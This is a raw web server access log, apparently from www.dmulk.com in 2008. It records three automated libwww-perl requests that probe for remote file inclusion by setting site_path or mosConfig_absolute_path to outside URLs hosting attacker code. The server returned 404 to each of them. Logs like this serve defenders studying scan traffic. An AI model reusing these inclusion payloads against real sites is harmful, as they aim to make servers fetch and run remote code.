70.168.36.247 - - [08/Jun/2008:11:56:59 -0700] "GET //include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:11:57:00 -0700] "GET /logs//include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.153.42 - - [08/Jun/2008:11:57:08 -0700] "GET /logs/access_080306.log/?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
